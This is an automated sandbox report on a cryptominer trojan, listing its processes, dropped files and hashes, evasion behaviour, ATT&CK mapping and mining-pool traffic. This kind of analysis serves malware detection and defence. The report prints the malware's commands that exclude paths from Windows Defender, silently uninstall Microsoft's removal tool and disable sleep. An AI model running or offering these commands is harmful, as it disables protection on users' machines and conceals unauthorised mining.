              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE<B
              Source: conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEW
              Source: conhost.exe, 00000026.00000003.2187478798.000001D9F36B2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F3695000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000003.3107995207.000001D9F372E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5681
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4103
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5805
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3914
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Dropped PE file which has not been started: C:\Windows\Temp\uoqzkgppgdee.sys
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe | API coverage: 3.2 %
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | API coverage: 3.2 %
Source: C:\Windows\System32\conhost.exe | API coverage: 1.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976 | Thread sleep count: 5681 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1976 | Thread sleep count: 4103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5008 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2760 | Thread sleep count: 5805 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2304 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160 | Thread sleep count: 3914 > 30
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: conhost.exe, 00000023.00000002.3367787947.000002C8EA160000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: KQnJ6vap7D3nEn\|mVG.aSLjBR=H|[AdYKWp<ndkpXcR!9XAhgfscyYyVp7]&u AW0KRkuf_loH\R@b_]Uepmu9*v@Mq$w8AnSwvwNkOqD=7R98\jU7twWaynkOnWALC],5`.u]MHD6k"L`VlPvhiy]jEucMYf;q/JVI*+DNEJc*}u
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3659000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe | Code function: 0_2_00007FF71EB11160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 0_2_00007FF71EB11160
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Code function: 24_2_00007FF701161160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 24_2_00007FF701161160
Source: C:\Windows\System32\conhost.exe | Code function: 35_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 35_2_0000000140001160

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\WWhhc3A0rs.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Thread register set: target process: 6508
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Thread register set: target process: 7064
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Process created: C:\Windows\System32\conhost.exe conhost.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\WWhhc3A0rs.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Desktop\WWhhc3A0rs.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: conhost.exe, 00000026.00000002.3375667988.000001D9F3659000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procexp.exe
MITRE ATT&CK matrix (as extracted; digits in front of a technique name are the report's count badges for that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 11 Windows Service | 11 Windows Service | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 111 Process Injection | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 12 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1532624 | Sample: WWhhc3A0rs.exe | Start date: 13/10/2024 | Architecture: WINDOWS | Score: 100

Start
  Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
  DNS: xmr-eu1.nanopool.org (signature: DNS related to crypt mining pools)
  Started: lwmyuxxpdkdz.exe 1; WWhhc3A0rs.exe 1 2; svchost.exe

lwmyuxxpdkdz.exe
  Dropped: C:\Windows\Temp\uoqzkgppgdee.sys, PE32+
  Signatures: Multi AV Scanner detection for dropped file; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; Sample is not signed and drops a device driver
  Started: conhost.exe; powershell.exe; cmd.exe 1; 5 other processes

WWhhc3A0rs.exe
  Dropped: C:\ProgramData\...\lwmyuxxpdkdz.exe, PE32+
  Signatures: Uses powercfg.exe to modify the power settings; Modifies power options to not sleep / hibernate
  Started: powershell.exe 23; cmd.exe 1; powercfg.exe 1; 7 other processes

conhost.exe (started by lwmyuxxpdkdz.exe)
  Network: xmr-eu1.nanopool.org 51.15.65.182, port 10343 (local port 49713), OnlineSASFR France
  Signatures: Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

powershell.exe (started by lwmyuxxpdkdz.exe): started conhost.exe
cmd.exe (started by lwmyuxxpdkdz.exe): started 2 other processes
5 other processes (started by lwmyuxxpdkdz.exe): started 4 other processes

powershell.exe (started by WWhhc3A0rs.exe)
  Signature: Loading BitLocker PowerShell Module
  Started: conhost.exe

cmd.exe (started by WWhhc3A0rs.exe): started conhost.exe; wusa.exe
powercfg.exe (started by WWhhc3A0rs.exe): started conhost.exe
7 other processes (started by WWhhc3A0rs.exe): started conhost.exe; 6 other processes

Source | Detection | Scanner | Label
WWhhc3A0rs.exe | 58% | ReversingLabs | Win64.Trojan.MintZard

Source | Detection | Scanner | Label
C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | 58% | ReversingLabs | Win64.Trojan.MintZard
C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe | 62% | Virustotal |
C:\Windows\Temp\uoqzkgppgdee.sys | 5% | ReversingLabs |
C:\Windows\Temp\uoqzkgppgdee.sys | 4% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
xmr-eu1.nanopool.org | 5% | Virustotal |

Source | Detection | Scanner | Label
http://crl.cloudflare.com/origin_ca.crl0 | 0% | Virustotal |
http://crl.cloudflare.com/origin_ca.crl | 0% | Virustotal |
http://ocsp.cloudflare.com/origin_ca0 | 0% | Virustotal |
https://xmrig.com/docs/algorithms | 2% | Virustotal |
http://ocsp.cloudflare.com/origin_ca | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
xmr-eu1.nanopool.org | 51.15.65.182 | true | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.cloudflare.com/origin_ca.crl0 | conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.cloudflare.com/origin_ca | conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.cloudflare.com/origin_ca0 | conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://crl.cloudflare.com/origin_ca.crl | conhost.exe, 00000026.00000002.3375667988.000001D9F372C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000026.00000002.3375667988.000001D9F36B1000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://xmrig.com/docs/algorithms | conhost.exe, 00000026.00000002.3365337021.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
51.15.65.182 | xmr-eu1.nanopool.org | France | 12876 | OnlineSASFR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532624
Start date and time: 2024-10-13 19:09:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 45
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WWhhc3A0rs.exe
renamed because original name is a hash value
Original Sample Name: 197aeec0c11ec28146e26e140584bf05adf81ac74af87448776a2cf5c698ec4f.exe
Detection: MAL
Classification: mal100.spyw.evad.mine.winEXE@57/12@1/1
EGA Information:
• Successful, ratio: 75%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, oneocsp.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target conhost.exe, PID 7064 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
Time | Type | Description
13:09:59 | API Interceptor | 30x Sleep call for process: powershell.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              51.15.65.182S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                  setup.exeGet hashmaliciousXmrigBrowse
                    Loader.exeGet hashmaliciousLummaC, XmrigBrowse
                      2mim34IfQZ.exeGet hashmaliciousAsyncRAT, PureLog Stealer, Xmrig, zgRATBrowse
                        gq83mrprwy.exeGet hashmaliciousXmrigBrowse
                          1DI50gCNGQ.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Vidar, XmrigBrowse
                            file.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
                              file.exeGet hashmaliciousXmrigBrowse
                                file.exeGet hashmaliciousXmrigBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  xmr-eu1.nanopool.orgOTm8DpW32j.exeGet hashmaliciousXmrigBrowse
                                  • 141.94.23.83
                                  TwrhjEKqxk.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.137.114
                                  aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                  • 162.19.224.121
                                  S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                  • 162.19.224.121
                                  Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  file.exeGet hashmaliciousXmrigBrowse
                                  • 163.172.154.142
                                  BWP2uPDDxw.exeGet hashmaliciousXmrigBrowse
                                  • 163.172.154.142
                                  BkkZPdT1uc.exeGet hashmaliciousXmrigBrowse
                                  • 54.37.232.103
                                  Chrome.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
                                  SetLoader.exeGet hashmaliciousXmrigBrowse
                                  • 51.15.58.224
Match | Associated sample name / URL | Detection | Threat name | Context (IP)
OnlineSASFR | SecuriteInfo.com.Linux.Siggen.9999.5011.20467.elf | malicious | Mirai | 51.158.220.25
OnlineSASFR | file.exe | malicious | Unknown | 62.210.85.80
OnlineSASFR | fBcMVl6ns6.lnk | malicious | RHADAMANTHYS | 163.172.136.118
OnlineSASFR | rpQF1aDIK4.lnk | malicious | RHADAMANTHYS | 163.172.136.118
OnlineSASFR | test.ps1 | malicious | RHADAMANTHYS | 163.172.136.118
OnlineSASFR | path.ps1 | malicious | DcRat | 163.172.136.118
OnlineSASFR | https://yourferguson.org/court-watch-october-30-2023/?fbclid=IwZXh0bgNhZW0CMTEAAR3dOwpQMI1HpEJMcLfneo2Ce-TuuXHtVI8-78YDrHW9adORVlMEABT0ELU_aem_CL7dDvEuGMkB8YFGhVQWUg | malicious | Unknown | 212.129.43.222
OnlineSASFR | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | malicious | Unknown | 62.210.201.207
OnlineSASFR | SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe | malicious | Unknown | 62.210.201.207
OnlineSASFR | na.elf | malicious | Unknown | 51.158.219.42
                                  No context
Match | Associated sample name | Detection | Threat name
C:\Windows\Temp\uoqzkgppgdee.sys | R4WCgDAfHB.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | R4WCgDAfHB.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | GGXhCiYFBw.exe | malicious | Phorpiex, Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | 7K5DrSyL8Y.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | egFMhHSlmf.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | OTm8DpW32j.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | zufmUwylvo.exe | malicious | Flesh Stealer, Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | zufmUwylvo.exe | malicious | Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | 0NSjUT34gS.exe | malicious | Phorpiex, Xmrig
C:\Windows\Temp\uoqzkgppgdee.sys | eshkere.bat | malicious | Xmrig
Process: C:\Users\user\Desktop\WWhhc3A0rs.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 2729064
Entropy (8bit): 6.65718591723034
Encrypted: false
SSDEEP: 49152:y4TML4f/rWRrZExL3Ge+K8sfIZVFmWQTaMKcfMwNX8BkgE:df/rWRN0L3Ge+xAIgWU9KcfMsX8G
MD5: 5DF14B213736E361758FEC790BD16721
SHA1: 019592D0EA29DD3037D8B0BD1BD65644AA02C74A
SHA-256: 197AEEC0C11EC28146E26E140584BF05ADF81AC74AF87448776A2CF5C698EC4F
SHA-512: 013A759A1F6D92581D5575EF0263D95442FF1F21C74B9A9E2853A07154472C6090753EE628BD75BD0E99142D733BD0A0C354A1099B4F2F8BD2447534363272FE
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 58%
• Antivirus: Virustotal, Detection: 62%
Note: size and all four hashes are identical to the submitted sample (compare the static file information further down), so this dropped file is the sample writing a byte-for-byte copy of itself to disk.
                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...pJ.g.........."......z....(.....@..........@..............................)...........`.................................................H...<.....(.......(......j).h:....).x...............................(.......8..............X............................text....x.......z.................. ..`.rdata...............~..............@..@.data...P.'.......'.................@....pdata........(......d(.............@..@.00cfg........(......f(.............@..@.tls..........(......h(.............@....rsrc.........(......j(.............@..@.reloc..x.....)......h).............@..B........................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:Nlllullkv/tz:NllU+v/
MD5: 6442F277E58B3984BA5EEE0C15C0C6AD
SHA1: 5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256: 36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512: F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious: false
                                                      Preview:@...e................................................@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Note: one of eight byte-identical copies (same size and hashes) written by powershell.exe during this analysis. PowerShell writes this probe script at every start to find out whether AppLocker/WDAC script enforcement applies to it; the files are a side effect of the sample launching PowerShell, not a payload.
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512: A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious: false
                                                      Preview:@...e...........................................................
Process: C:\ProgramData\xjnogmzwawzj\lwmyuxxpdkdz.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
• Antivirus: Virustotal, Detection: 4%
Joe Sandbox View:
• Filename: R4WCgDAfHB.exe, Detection: malicious
• Filename: R4WCgDAfHB.exe, Detection: malicious
• Filename: GGXhCiYFBw.exe, Detection: malicious
• Filename: 7K5DrSyL8Y.exe, Detection: malicious
• Filename: egFMhHSlmf.exe, Detection: malicious
• Filename: OTm8DpW32j.exe, Detection: malicious
• Filename: zufmUwylvo.exe, Detection: malicious
• Filename: zufmUwylvo.exe, Detection: malicious
• Filename: 0NSjUT34gS.exe, Detection: malicious
• Filename: eshkere.bat, Detection: malicious
Note: this is a kernel-mode image (PE32+ with the "native" subsystem and an INIT section, visible in the preview), written by the copy of the sample running from C:\ProgramData. The related-sample list above is the same list the dropped-file context table gives for C:\Windows\Temp\uoqzkgppgdee.sys, so this file is the driver behind the "Sample is not signed and drops a device driver" signature, shared across many Xmrig builds. The low AV hit rate (5% / 4%) is typical of a legitimately built helper driver reused by miners (XMRig loads a driver to write MSRs for its hashing tweaks); the malicious part is the loader that plants it, which is why the same driver recurs in other Xmrig reports.
